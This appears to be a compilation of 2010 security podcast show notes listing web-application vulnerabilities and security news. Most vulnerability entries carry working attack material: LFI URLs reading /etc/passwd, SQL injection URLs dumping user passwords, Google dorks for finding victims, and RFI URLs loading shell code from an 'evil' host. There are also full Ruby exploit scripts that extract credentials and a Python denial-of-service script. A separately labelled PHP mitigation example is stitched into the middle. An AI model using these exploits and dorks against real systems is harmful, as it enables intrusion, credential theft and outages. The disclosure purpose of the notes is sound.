      'Site:  www.securestate.com
      'Date Discovered: 02/11/10
      'Vendor Notified: 02/02/10 --> NO RESPONSE
      'Vendor Notified: 02/11/10 --> NO RESPONSE
      'Vendor Notified: 02/17/10 --> NO RESPONSE
      'Published 04/13/10
      'www:  http://www.magnetosoft.com/products/skdns/skdns_features.htm
      'Download:  http://www.magnetosoft.com/downloads/skdns_setup.exe
      'SKNetResource.ocx
      'Function DNSLookupHostWithServer ( ByVal strHostName As String ,  ByVal strNameServer As String ) As Long
      'progid = "SKDNSLib.SKDns"

      arg1 = "%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n"
      arg2 = "defaultV"
      target.DNSLookupHostWithServer arg1, arg2

      </script>
      </html>

    Stories of Interest:
    News item 1:  http://www.darkreading.com/vulnerability_management/security/management/showArticle.jhtml?articleID=224400589

    Conducting penetration testing in-house rather than using an outside consultant is worth considering for reasons of both cost and security expertise — but it’s also a step not to be taken lightly.

    “The advantage of having in-house penetration testers is the focus they provide,” says Chris Nickerson, founder of security firm Lares Consulting. “They’re able to keep track of the latest exploits and vulnerabilities, constantly monitor systems, and practice and sharpen their skills. But in order to achieve those benefits, they have to be focused.”

    Nickerson points out that while some really large enterprises are fielding teams wholly dedicated to testing, for most companies pen tests are only part of the testers’ responsibilities. “It’s all too common to find penetration tests delayed or put off because the tester has too many other open tickets to deal with,” he says.

    While even a part-time pen-test specialist on staff can be a step in the right direction, it can also be risky. “The variety of tools available for pen tests today is remarkable, and I pretty much applaud them all,” he says. “Metasploit, Canvas, Core, Nessus, and others have spent a lot of time ensuring that installing their agents don’t blow the boxes that are being tested. That’s the default: Once the agent is installed and it’s determined whether or not the exploit works, the agent is uninstalled.”

    2010
    04.22

    Episode 114 – feel the need for mead?

    InfoSec Daily Podcast

     
    ISD Podcast Episode 114 for April 22, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.
    Announcements:

    Atlanta ISSA:

    • Atlanta Secureworld Expo  April 27 – 28, 2010  Cobb Galleria Centre (http://www.secureworldexpo.com/events/index.php?id=281)

    Vulnerabilities of Interest:

      1. MKPortal Contact module is subject to a Cross-Site Scripting (XSS) vulnerability. Example URLs are available: http://www.sample.com/contact/index.php?blocks=%3Cscript%3Ealert(1)%3C/script%3E

        http://www.sample.com/contact/mail.php?to=1@1.1&mess=2&subj=3&headers=4&name=5&teme=6&soob=7&email=2@2.2&output=%3Cscript%3Ealert(1)%3C/script%3E

        http://www.sample.com/contact/mail.php?to=1@1.1&mess=2&subj=3&headers=4&name=5&teme=6&soob=7&email=2@2.2&blocks=%3Cscript%3Ealert(1)%3C/script%3E

      2. Joomla Component com_jp_jobs is subject to a SQL Injection vulnerability. Version 1.2.0 is impacted, though others may be as well. Google Dork “inurl:option=com_jp_jobs”.  Example URL is available: http://www.sample.com/index.php?option=com_jp_jobs&view=detail&id=-999999/**/union/**/all/**/select/**/1,2,group_concat(username,char(58),password)v3n0m,4,5,6,7,8,9,10,11,12,13,14/**/from/**/jos_users--
      3. Blog System is subject to a Local File Inclusion (LFI) vulnerability. Versions older than 1.5 are impacted, though others may be as well. Google Dorks “inurl:category=home”, “inurl:category=comments”, “inurl:category=lists”, “inurl:category=habillage” and “inurl:category=info”.  Example URLs are available: http://www.sample.com/ADMIN/index.php?category=home&action=../../../../../../../../etc/passwd%00

        http://www.sample.com/ADMIN/index.php?category=comments&action=../../../../../../../../etc/passwd%00

        http://www.sample.com/ADMIN/index.php?category=lists&action=../../../../../../../../etc/passwd%00

        http://www.sample.com/ADMIN/index.php?category=habillage&action=../../../../../../../../etc/passwd%00

        http://www.sample.com/ADMIN/index.php?category=info&action=../../../../../../../../etc/passwd%00

      4. Vieassociative Openmairie is subject to multiple Remote and Local File Inclusion (RFI/LFI) vulnerabilities. Version 1.01 beta is impacted, though others may be as well.  Example URLs are available: http://www.sample.com/[path]/gen/obj/association.class.php?path_om=[Shell]

        http://www.sample.com/[path]/gen/obj/collectivite.class.php?path_om=[Shell]

        http://www.sample.com/[path]/gen/obj/planning.class.php?path_om=[Shell]

        http://www.sample.com/[path]/gen/obj/rubrique.class.php?path_om=[Shell]

        http://www.sample.com/[path]/gen/obj/assurance.class.php?path_om=[Shell]

        http://www.sample.com/[path]/gen/obj/cotisation.class.php?path_om=[Shell]

        http://www.sample.com/[path]/gen/obj/profil.class.php?path_om=[Shell]

        http://www.sample.com/[path]/gen/obj/utilisateur.class.php?path_om=[Shell]

        http://www.sample.com/[path]/gen/obj/bureau.class.php?path_om=[Shell]

        http://www.sample.com/[path]/gen/obj/droit.class.php?path_om=[Shell]

        http://www.sample.com/[path]/gen/obj/aquartier.class.php?path_om=[Shell]

        http://www.sample.com/[path]/gen/obj/categorie.class.php?path_om=[Shell]

        http://www.sample.com/[path]/gen/obj/fonction.class.php?path_om=[Shell]

        http://www.sample.com/[path]/gen/obj/ressource.class.php?path_om=[Shell]

        http://www.sample.com/[path]/scr/soustab.php?dsn[phptype]=[LFI%00]

      5. 60cycleCMS (DOCUMENT_ROOT) is subject to a Local File Inclusion (LFI) vulnerability. Version 2.5.2 is impacted, though others may be as well. Example URLs are available: http://www.sample.com/60cycleCMS_path/news.php?DOCUMENT_ROOT=[LFI]%00
        http://www.sample.com/60cycleCMS_path/submitComment.php?DOCUMENT_ROOT=[LFI]%00
        http://www.sample.com/60cycleCMS_path/common/sqlConnect.php?DOCUMENT_ROOT=[LFI]%00
      6. Joomla Component Jvehicles is subject to a SQL Injection vulnerability. Versions 1.0 and 2.0 are impacted, though others may be as well. Google Dork “inurl:option=com_jvehicles”.  Example URL is available: http://www.sample.com/index.php?option=com_jvehicles&task=agentlisting&aid=31337
      7. Openurgence vaccin is subject to Local and Remote File Inclusion (LFI/RFI) vulnerabilities. Version 1.03 is impacted, though others may be as well. Example URLs are available: http://www.sample.com/gen/obj/collectivite.class.php?path_om=[Shell]

        http://www.sample.com/gen/obj/injection.class.php?path_om=[Shell]

        http://www.sample.com/gen/obj/utilisateur.class.php?path_om=[Shell]

        http://www.sample.com/gen/obj/droit.class.php?path_om=[Shell]

        http://www.sample.com/gen/obj/laboratoire.class.php?path_om=[Shell]

        http://www.sample.com/gen/obj/vaccin.class.php?path_om=[Shell]

        http://www.sample.com/gen/obj/effetsecondaire.class.php?path_om=[Shell]

        http://www.sample.com/gen/obj/medecin.class.php?path_om=[Shell]

        http://www.sample.com/gen/obj/individu.class.php?path_om=[Shell]

        http://www.sample.com/gen/obj/profil.class.php?path_om=[Shell]

        http://www.sample.com/scr/soustab.php?dsn[phptype]=../../../../../../../../etc/passwd%00

      8. Police Municipale Open Main Courante is subject to Local and Remote File Inclusion (LFI/RFI) vulnerabilities. Version 1.01beta is impacted, though others may be as well. Example URLs are available: http://www.sample.com/gen/obj/affectation.class.php?path_om[Shell]

        http://www.sample.com/gen/obj/categorie.class.php?path_om[Shell]

        http://www.sample.com/gen/obj/maincourante.class.php?path_om[Shell]

        http://www.sample.com/gen/obj/planning.class.php?path_om[Shell]

        http://www.sample.com/gen/obj/utilisateur.class.php?path_om[Shell]

        http://www.sample.com/gen/obj/affectationportable.class.phpp?path_om[Shell]

        http://www.sample.com/gen/obj/collectivite.class.php?path_om[Shell]

        http://www.sample.com/gen/obj/mission.class.php?path_om[Shell]

        http://www.sample.com/gen/obj/portable.class.php?path_om[Shell]

        http://www.sample.com/gen/obj/vehicule.class.php?path_om[Shell]

        http://www.sample.com/gen/obj/affectationvehicule.class.php?path_om[Shell]

        http://www.sample.com/gen/obj/droit.class.php?path_om[Shell]

        http://www.sample.com/gen/obj/nature.class.php?path_om[Shell]

        http://www.sample.com/gen/obj/profil.class.php?path_om[Shell]

        http://www.sample.com/gen/obj/agent.class.php?path_om[Shell]

        http://www.sample.com/gen/obj/intervention.class.php?path_om[Shell]

        http://www.sample.com/gen/obj/periode.class.php?path_om[Shell]

        http://www.sample.com/gen/obj/urgence.class.php?path_om[Shell]

        http://www.sample.com/scr/soustab.php?dsn[phptype]=../../../../../../../../etc/passwd%00

      9. joelz bulletin board is subject to a SQL Injection vulnerability. Versions older than 0.9.9rc3 are impacted, though others may be as well. Exploit code is available:
        #!/usr/bin/ruby
        #4004-security-project.com
        #Discovered and vulnerability by Easy Laster
        require 'net/http'
        print "\nEnter host name (site.com)->"
        host=gets.chomp
        print "\nEnter script path (/forum/)->"
        path=gets.chomp
        print "\nEnter user id (userid)->"
        userid=gets.chomp
        begin
        dir = "showforum.php?forum=1+and+1=0+union+select+1,2,3,4,5,6,concat(0x23,0x23,0x23,0x23,0x23,username,0x23,0x23,0x23,0x23,0x23),8+from+user+where+erstellerid="+ userid +"--"
        http = Net::HTTP.new(host, 80)
        resp= http.get(path+dir)
        print "\nid -> "+(/#####(.+)#####/).match(resp.body)[1]
        dir = "showforum.php?forum=1+and+1=0+union+select+1,2,3,4,5,6,concat(0x23,0x23,0x23,0x23,0x23,passwort,0x23,0x23,0x23,0x23,0x23),8+from+user+where+erstellerid="+ userid +"--"
        http = Net::HTTP.new(host, 80)
        resp= http.get(path+dir)
        print "\npassword -> "+(/#####(.+)#####/).match(resp.body)[1]
        dir = "showforum.php?forum=1+and+1=0+union+select+1,2,3,4,5,6,concat(0x23,0x23,0x23,0x23,0x23,email,0x23,0x23,0x23,0x23,0x23),8+from+user+where+erstellerid="+ userid +"--"
        http = Net::HTTP.new(host, 80)
        resp= http.get(path+dir)
        print "\nEmail -> "+(/#####(.+)#####/).match(resp.body)[1]
        print "\n#########################################################"
        rescue
        print "\nExploit failed"
        end

      Stories of Interest:
      News item 1:  http://www.memphisdailynews.com/editorial/Article.aspx?id=49432

      David Kernell, a 22-year-old student at the University of Tennessee, is accused of accessing Sarah Palin’s Yahoo! email account by answering her security question and resetting her password, then posting screenshots of the hacked account, which included Bristol Palin’s phone number.  Bristol Palin, the daughter of former Alaska governor Sarah Palin, testified in a Knoxville, Tenn., court Wednesday that the hacking of her mother’s personal email account led to her being pestered by anonymous phone calls.

      Kernell was apparently asked what he thought of Bristol Palin and replied, “Not my type.”  Convictions on all four felony charges – identity theft, wire fraud, intentionally accessing Palin’s e-mail account without authorization and obstructing an FBI investigation – could send Kernell to prison for up to 50 years.
      News item 2: http://www.zdnet.co.uk/news/security-threats/2010/04/16/security-researchers-demo-cisco-wi-fi-flaws-40088653/
      Two generations of Cisco wireless LAN equipment contain a range of vulnerabilities, researchers have told the Black Hat security conference.

      Enno Rey and Daniel Mende from German testing firm ERNW demonstrated how to hack into two separate generations of Cisco Wi-Fi kit. They said that the flaws were fairly easy to find and exploit.

      In a presentation called ‘Hacking Cisco Enterprise WLANs’ on Wednesday, the researchers demonstrated an attack aimed at Cisco’s first-generation equipment, the Cisco Structured Wireless Aware Network (Swan).  The researchers said it was possible to launch denial of service attacks and to sniff encrypted traffic on Swan by exploiting weaknesses in Cisco’s Wireless LAN Context Control Protocol (WLCCP). The protocol defines how information is sent between wireless access points.  Swan access points transfer keys between them to facilitate roaming. Rey said that Leap – the authentication protocol used in Cisco’s equipment – was weak, meaning that the cryptography used to hide the keys could be broken.

      News item 3: http://vil.nai.com/vil/5958_false.htm
      “McAfee identified a new threat that impacts Windows PCs. Researchers worked diligently to address this threat that attacks critical Windows system executables and buries itself deep into a computer’s memory.  The McAfee research team created detection and removal to address this threat. The remediation passed our quality testing and was released with the 5958 virus definition file at 2:00 PM GMT+1 (6am Pacific Time) on Wednesday, April 21.”

      Not long after that, reports began to surface that Windows PCs, primarily Windows XP SP3 PCs, were experiencing significant issues, including constant rebooting or the ever-popular BSOD (blue screen of death) system crash.

      A number of customers experienced a false positive resulting in the ensuing chaos. The 5958 virus definitions apparently detect svchost.exe, a core system file on Windows PCs, as a malware threat. According to the McAfee statement, though, “corporations who kept a feature called “Scan Processes on Enable” in McAfee VirusScan Enterprise disabled, as it is by default, were not affected.”

      McAfee responded by quickly pulling the faulty update from the McAfee servers. An emergency extra.dat file was made available in the McAfee forums to address the issue, but the forums site was so overwhelmed with customer backlash that it was eventually taken offline. A corrected virus definition file, 5959, is now available, and McAfee has posted instructions to recover affected systems.

      2010
      04.21

      Episode 113 – Interview with John Smith

      InfoSec Daily Podcast

       
      ISD Podcast Episode 113 for April 21, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.


      Interview:
      Tonight we have a special guest, John Smith.  John is the creator of XEN-trifuge and edgesightunderthehood.com.

      Welcome to our podcast John.

      2010
      04.20

      Episode 112

      InfoSec Daily Podcast

       
      ISD Podcast Episode 112 for April 20, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

      Vulnerabilities of Interest:

        1. Joomla Component Web TV is subject to a Local File Inclusion (LFI) vulnerability.  Google Dork “inurl:option=com_webtv”.  Example URL is available:

          http://www.sample.com/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00

        2. Joomla Component Horoscope is subject to a Local File Inclusion (LFI) vulnerability.  Google Dork “inurl:option=com_horoscope”.  Example URL is available:

          http://www.sample.com/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00

        3. Joomla Component Arcade Games is subject to a Local File Inclusion (LFI) vulnerability.  Version 1.0 is impacted, though others may be as well. Google Dork “inurl:option=com_arcadegames”.  Example URL is available:

          http://www.sample.com/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00

        4. Joomla Component FlashGames is subject to a Local File Inclusion (LFI) vulnerability.  Version 1.5.0 is impacted, though others may be as well. Google Dork “inurl:option=com_flashgames”.  Example URL is available:

          http://www.sample.com/index.php?option=com_flashgames&controller=../../../../../../../../../../etc/passwd%00

        5. Joomla Component AddressBook is subject to a Local File Inclusion (LFI) vulnerability.  Version 1.5.0 is impacted, though others may be as well. Google Dork “inurl:option=com_addressbook”.  Example URL is available:

          http://www.sample.com/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00

        6. Joomla Component Easy Ad Banner is subject to a Local File Inclusion (LFI) vulnerability.  Version 0.25 is impacted, though others may be as well. Google Dork “inurl:option=com_advertising”.  Example URL is available:

          http://www.sample.com/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00

        7. Joomla Component CV Maker is subject to a Local File Inclusion (LFI) vulnerability.  Version 1.0 is impacted, though others may be as well. Google Dork “inurl:option=com_cvmaker”.  Example URL is available:

          http://www.sample.com/index.php?option=com_cvmaker&controller=../../../../../../../../../../etc/passwd%00

        8. Joomla Component My Files is subject to a Local File Inclusion (LFI) vulnerability.  Version 1.0 is impacted, though others may be as well. Google Dork “inurl:option=com_myfiles”.  Example URL is available:

          http://www.sample.com/index.php?option=com_myfiles&controller=../../../../../../../../../../etc/passwd%00

        9. Joomla Component Online Exam is subject to a Local File Inclusion (LFI) vulnerability.  Version 1.5.0 is impacted, though others may be as well. Google Dork “inurl:option=com_onlineexam”.  Example URL is available:

          http://www.sample.com/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00

        10. Joomla Component JoomMail is subject to a Local File Inclusion (LFI) vulnerability.  Version 1.5.0 is impacted, though others may be as well. Google Dork “inurl:option=com_joommail”.  Example URL is available:

          http://www.sample.com/index.php?option=com_joommail&controller=../../../../../../../../../../etc/passwd%00

        11. Joomla Component Memory Book is subject to a Local File Inclusion (LFI) vulnerability.  Version 1.2 is impacted, though others may be as well. Google Dork “inurl:option=com_memory”.  Example URL is available:

          http://www.sample.com/index.php?option=com_memory&controller=../../../../../../../../../../etc/passwd%00

        12. Joomla Component Online Market is subject to a Local File Inclusion (LFI) vulnerability.  Version 2.x is impacted, though others may be as well. Google Dork “inurl:option=com_market”.  Example URL is available:

          http://www.sample.com/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00

        13. Joomla Component Digital Diary is subject to a Local File Inclusion (LFI) vulnerability.  Version 1.5.0 is impacted, though others may be as well. Google Dork “inurl:option=com_diary”.  Example URL is available:

          http://www.sample.com/index.php?option=com_diary&controller=../../../../../../../../../../etc/passwd%00

        14. Joomla Component World Rates is subject to a Local File Inclusion (LFI) vulnerability. Google Dork “inurl:option=com_worldrates”.  Example URL is available:

          http://www.sample.com/index.php?option=com_worldrates&controller=../../../../../../../../../../etc/passwd%00

        15. Joomla Component Record is subject to a Local File Inclusion (LFI) vulnerability. Google Dork “inurl:option=com_record”.  Example URL is available:

          http://www.sample.com/index.php?option=com_record&controller=../../../../../../../../../../etc/passwd%00

        16. Joomla Component Sweetykeeper is subject to a Local File Inclusion (LFI) vulnerability.  Version 1.5.x is impacted, though others may be as well. Google Dork “inurl:option=com_sweetykeeper”.  Example URL is available:

          http://www.sample.com/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00

        17. Joomla Component FLEXIcontent is subject to a Local File Inclusion (LFI) vulnerability.  Version 1.5 stable is impacted, though others may be as well. Google Dork “inurl:option=com_flexicontent”.  Example URL is available:

          http://www.sample.com/index.php?option=com_flexicontent&controller=../../../../../../../../../../etc/passwd%00

        18. Joomla Component com_jdrugstopics is subject to a SQL Injection vulnerability.  Google Dork “inurl:option=com_jdrugstopics”.  Example URL is available:

          http://www.sample.com/index.php?option=com_jdrugstopics&view=drugsdetails&id=-226 UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13 from jos_users--

        19. Joomla Component Sermon Speaker is subject to a SQL Injection vulnerability.  Google Dork “inurl:option=com_sermonspeaker”.  Example URL is available:

          http://www.sample.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/**/

        20. FusionForge is subject to a Remote File Inclusion (RFI) vulnerability.  Version 5.0 is impacted, though others may be as well. 283 example URLs are available:


        In almost all of the preceding cases, the vulnerability could be trivially mitigated through input validation. In PHP the main cause is the use of unvalidated external variables such as $_GET, $_POST and $_COOKIE with a filesystem function, most notably the include and require statements. Most of these vulnerabilities can be attributed to novice programmers who are not familiar with all of the capabilities of the PHP language. PHP has an allow_url_fopen directive; if it is enabled, filesystem functions accept a URL and will retrieve data from remote locations. An attacker alters a variable that is passed to one of these functions so that it includes malicious code from a remote resource. To mitigate this, all user input needs to be validated before it is used.
        A simple check that rejects non-alphanumeric characters would suffice in most of these cases. However, where possible we would recommend avoiding user input for this type of logic entirely, and instead selecting the proper include from a hardcoded list of known-good files based on a user-supplied index number or hash.
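The include() pattern behind the LFI and RFI items above, beside the two mitigations this paragraph recommends (the alphanumeric check and the hard-coded whitelist), as an added PHP example that is not code from the podcast or from any component listed here; the controller parameter name mirrors the Joomla URLs on this page, while the controllers/ directory and the file list are assumptions.

```php
<?php
// Added example, not code from the podcast or from any component named above.
// It shows the include() pattern behind the LFI/RFI items beside the two fixes the
// text recommends. The 'controller' parameter mirrors the Joomla example URLs on this
// page; the controllers/ directory and the file list are hypothetical.

declare(strict_types=1);

// ---------------------------------------------------------------------------
// VULNERABLE: the request parameter flows straight into include().
//   controller=../../../../etc/passwd%00   reads a local file (LFI); the NUL byte
//                                          truncated the path in PHP before 5.3.4.
//   controller=http://remote.example/x     executes remote code (RFI) when both
//                                          allow_url_fopen and allow_url_include
//                                          are On (the latter is Off by default
//                                          since PHP 5.2).
// ---------------------------------------------------------------------------
function load_controller_vulnerable(array $get): void
{
    $controller = $get['controller'] ?? 'default';
    include __DIR__ . '/controllers/' . $controller . '.php';   // never do this
}

// ---------------------------------------------------------------------------
// FIX 1: validate. Accept only short, purely alphanumeric names, which rules out
// "../", a NUL byte, "/" and the "scheme://" of any URL before a path is built.
// Returns the path to include, or null when the input is refused.
// ---------------------------------------------------------------------------
function resolve_controller_validated(string $controller): ?string
{
    // ctype_alnum() is false for '', for "../", for NUL and for "http://".
    if (strlen($controller) > 32 || !ctype_alnum($controller)) {
        return null;
    }
    return __DIR__ . '/controllers/' . $controller . '.php';
}

// ---------------------------------------------------------------------------
// FIX 2 (the text's preferred option): user input never becomes part of a path.
// The client supplies a key; the file name comes from a hard-coded list.
// ---------------------------------------------------------------------------
const CONTROLLERS = [
    'rates'   => 'controllers/rates.php',
    'record'  => 'controllers/record.php',
    'sermons' => 'controllers/sermons.php',
];

function resolve_controller_whitelisted(string $key): ?string
{
    // The key is only ever used as an array index; "../x" or a URL is simply not a key.
    if (!array_key_exists($key, CONTROLLERS)) {
        return null;
    }
    return __DIR__ . '/' . CONTROLLERS[$key];
}

// Request handler built on FIX 2: unknown keys get a 404, nothing else is included.
function load_controller_hardened(array $get): void
{
    $path = resolve_controller_whitelisted((string) ($get['controller'] ?? 'rates'));
    if ($path === null) {
        http_response_code(404);
        exit('unknown controller');
    }
    include $path;
}

// Demo with the kinds of input seen on this page (constructed values). 'default'
// passes the alphanumeric check but not the whitelist, showing why FIX 2 is stricter.
if (PHP_SAPI === 'cli') {
    $samples = [
        'rates',
        'default',
        "../../../../etc/passwd\0",
        'http://remote.example/shell.txt',
    ];
    foreach ($samples as $in) {
        $v = resolve_controller_validated($in);
        $w = resolve_controller_whitelisted($in);
        printf("%-40s validated=%-8s whitelisted=%s\n",
            addcslashes($in, "\0"),
            $v === null ? 'REFUSED' : 'ok',
            $w === null ? 'REFUSED' : 'ok');
    }
}
```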

        Stories of Interest:
        News item 1: http://www.theregister.co.uk/2010/04/16/pacemaker_security_tattoo/
        A Microsoft researcher has suggested tattooing passwords on patients with pacemakers and other implanted medical devices to ensure the remotely-controlled gadgets can be accessed during emergencies.

        The proposal, by Stuart Schechter of Microsoft Research, is the latest to grapple with the security of implanted medical devices equipped with radio transmitters so that they can be controlled without the need for surgery. Besides pacemakers, other types of potentially vulnerable devices include insulin pumps and cardiac defibrillators.

        In 2008, researchers demonstrated that heart monitors were susceptible to wireless hacks that caused pacemakers to shut off or leak personal information. But equally devastating are scenarios in which physicians are unable to provide emergency care because they don’t have the access codes needed to control the devices.

        In a paper published last week, Schechter proposed that access to such devices be controlled with encryption similar to what’s used on wi-fi networks. Access keys would then be tattooed on patients using ink that’s invisible under most conditions.

        2010
        04.19

        InfoSec Daily Podcast

        ISD Podcast Episode 111 for April 19, 2010. This podcast is our contribution back to the community, where we discuss the vulnerabilities of interest and information security related news, hopefully providing you a few laughs and a little knowledge.

        Announcements:


        Atlanta ISSA:

        • Atlanta Secureworld Expo – April 27 – 28, 2010, Cobb Galleria Centre (http://www.secureworldexpo.com/events/index.php?id=281)

        Kentuckiana ISSA:

        Friends of the Podcast:

        Webhosting services: WebSpeedway

        Vulnerabilities of Interest:

          1. Joomla Component JProject Manager is subject to a Local File Inclusion (LFI) vulnerability. Version 1.0 is impacted, though others may be as well.  Google Dork inurl:com_jprojectmanager. Example URL is available: http://www.sample.com/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00
          2. Joomla Component Jfeedback! is subject to a Local File Inclusion (LFI) vulnerability. Version 1.2 is impacted, though others may be as well.  Google Dork inurl:com_jfeedback. Example URL is available: http://www.sample.com/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00
          3. Joomla Component JA Job Board is subject to a Local File Inclusion (LFI) vulnerability. Version 1.4.4 is impacted, though others may be as well.  Google Dork inurl:com_jajobboard. Example URLs are available:

            http://www.sample.com/index.php?option=com_jajobboard&view=../../../../../../../../../../etc/passwd%00

            http://www.sample.com/index.php?option=com_jajobboard&controller=../../../../../../../../../../etc/passwd%00

          4. Joomla Component Ticketbook is subject to a Local File Inclusion (LFI) vulnerability. Version 1.0.1 is impacted, though others may be as well.  Google Dork inurl:com_ticketbook. Example URL is available: http://www.sample.com/index.php?option=com_ticketbook&controller=../../../../../../../../../../etc/passwd%00
          5. Joomla Component TweetLA! is subject to a Local File Inclusion (LFI) vulnerability. Version 1.0.1 is impacted, though others may be as well.  Google Dork inurl:=com_tweetla. Example URL is available: http://www.sample.com/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00
          6. Joomla Component papers is subject to a SQL Injection vulnerability. Google Dork inurl:option=com_papers.  Example URL is available:

            http://www.sample.com/xampp/joomla/index.php?ption=com_papers&task=details&sid=943/**/AND+1=2/**/UNION/**/SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*

          7. Joomla Component Multi-Venue Restaurant Menu Manager is subject to a SQL Injection vulnerability. Versions older than 1.5.2 Stable Update 3 are impacted, though others may be as well. Google Dork inurl:option=com_mv_restaurantmenumanager.  Example URL is available: http://www.sample.com/index.php?option=com_mv_restaurantmenumanager&task=menu_display&Venue=XX&mid=XX&Itemid=XX
          8. vBulletin “Cyb – Advanced Forum Statistics” is subject to a Denial of Service vulnerability. Exploit code is available:
            #!/usr/bin/python
            import urllib,urllib2,re
            print "####################################"
            print "#[+]ICW 0-day Domain Crasher #"
            print "#[+] Exploit found by Yash [ICW] #"
            print "#[+] Exploit Coded by FB1H2S [ICW] #"
            print "#[+] Care-Taker d4rk-blu [ICW] #"
            print "#[+] Indian Cyber Warriors #"
            print "####################################\n"
            print "Enter Domain Adress:"
            domain=raw_input("[+]Ex: www.site.com:")
            url ='http://'+domain+'/misc.php?show=latestposts&vsacb_resnr=10000000'
            res = urllib.urlopen(url).read(200)
            phpmem= re.findall('of (.*?)bytes.*?',res)
            bytes=int(phpmem[0])
            mb=bytes/1048576
            print '[+]Server php memmory is:'+str(mb)+' MB'
            print "[+]Enter the No of request you wann send:"
            kill=raw_input("Some 20-30 will be enough:")
            try:
                for i in range(1,int(kill)):
                    print i
                    res1 = urllib.urlopen(url).read(200)
                    print res1
            except(IOError),msg: print "Server will be FCUK'ed by now"
          9. MKPortal Contact module is subject to a Cross Site Scripting (XSS) vulnerability. Example URLs are available:

            http://www.sample.com/contact/index.php?blocks=%3Cscript%3Ealert(1)%3C/script%3E

            http://www.sample.com/contact/mail.php?to=1@1.1&mess=2&subj=3&headers=4&name=5&teme=6&soob=7&email=2@2.2&output=%3Cscript%3Ealert(1)%3C/script%3E

            http://www.sample.com/contact/mail.php?to=1@1.1&mess=2&subj=3&headers=4&name=5&teme=6&soob=7&email=2@2.2&blocks=%3Cscript%3Ealert(1)%3C/script%3E

          10. OnePC mySite Management Software is subject to a SQL Injection vulnerability. Example URL is available: http://www.sample.com/index.php?view=docs&doc_id=XX+AND+1=2+UNION+SELECT+concat(user()),concat(user()),concat(user()),concat(user()),5–
          11. Elite Gaming Ladders is subject to a SQL Injection vulnerability. Versions older than 3.5 are impacted, though others may be as well. Exploit code is available:
            #!/usr/bin/ruby
            #4004-security-project.com
            #Discovered and vulnerability by Easy Laster
            print "
            #########################################################
            #                   4004-Security-Project               #
            #########################################################
            #        Elite Gaming Ladders <= v3.5 SQL injection     #
            #                          Exploit                      #
            #                     Using Host+Path                   #
            #                    www.demo.de /forum/ 1              #
            #                         Easy Laster                   #
            #########################################################
            "

            require 'net/http'
            print "#########################################################"
            print "\nEnter host name (site.com)->"
            host=gets.chomp
            print "#########################################################"
            print "\nEnter script path (/forum/)->"
            path=gets.chomp
            print "#########################################################"
            print "\nEnter script path (userid)->"
            userid=gets.chomp
            print "#########################################################"
            begin
              dir = "matchdb.php?match=9999999+and+1=0+union+select+1,2,3,4,5,concat(0x23,0x23,0x23,0x23,0x23,name,0x23,0x23,0x23,0x23,0x23),7+from+members+where+id="+ userid +"--"
              http = Net::HTTP.new(host, 80)
              resp= http.get(path+dir)
              print "\nid -> "+(/#####(.+)#####/).match(resp.body)[1]
              dir = "matchdb.php?match=9999999+and+1=0+union+select+1,2,3,4,5,concat(0x23,0x23,0x23,0x23,0x23,password,0x23,0x23,0x23,0x23,0x23),7+from+members+where+id="+ userid +"--"
              http = Net::HTTP.new(host, 80)
              resp= http.get(path+dir)
              print "\npassword -> "+(/#####(.+)#####/).match(resp.body)[1]
              dir = "matchdb.php?match=9999999+and+1=0+union+select+1,2,3,4,5,concat(0x23,0x23,0x23,0x23,0x23,email,0x23,0x23,0x23,0x23,0x23),7+from+members+where+id="+ userid +"--"
              http = Net::HTTP.new(host, 80)
              resp= http.get(path+dir)
              print "\nEmail -> "+(/#####(.+)#####/).match(resp.body)[1]
              print "\n#########################################################"
            rescue
              print "\nExploit failed"
            end
          12. HotNews is subject to a Remote File Inclusion (RFI) vulnerability. Version 0.7.2 is impacted, though others may be as well. Google Dork inurl:hnmain.inc.php.  Example URL is available: http://www.sample.com/includes/hnmain.inc.php3?config[incdir]=http://evil/cmd.gif???
          13. IE/Opera source code viewer is subject to a Null Character Handling vulnerability. The source code viewer in both browsers (IE & Opera) mishandles the null control character (0x00): when this character is included in the transmitted page, the viewer conceals the content that follows it, and only the code between valid tags is shown. In other words, by exploiting this vulnerability the page source can be completely hidden from users of the Internet Explorer and Opera browsers. Proof of Concept code is available:
            <?php
            echo "\x00";
            ?>
            Esto es un mensaje oculto
            This is a hidden message
            Este es otro
            This is another one

            Como vemos podemos esconder cualquier mensaje
            As we can see we can hide any message
            <html>
            <head>
            <title>Titulo</title>
            </head>
            <body>
            <h1>Hola mundo</h1>
            </body>
            </html>

            The next one hides only part of the code (the script part):
            <html>
            <head>
            <title>Titulo</title>
            </head>
            <body>
            <h1>Hello world</h1>
            </body>
            </html>
            <?php
            echo chr(0);
            ?>
            <script>alert('This code is never seen');</script>

          14. Worldviewer.com CMS is subject to a SQL Injection vulnerability. Google Dork inurl:”php/showContent.php?linkid=” or inurl:”/php/showNews.php?newsid=”.  Example URL is available:

            http://www.sample.com/php/showNews.php?newsid=-5+union+select+all+1,version()–

            http://www.sample.com/php/showContent.php?linkid=-5+union+select+all+version()–

          15. YaPig is subject to a Remote File Inclusion (RFI) vulnerability. Version 0.94.0u is impacted, though others may be as well.  Example URL is available:

            http://www.sample.com/last_gallery.php?YAPIG_PATH={Shell}

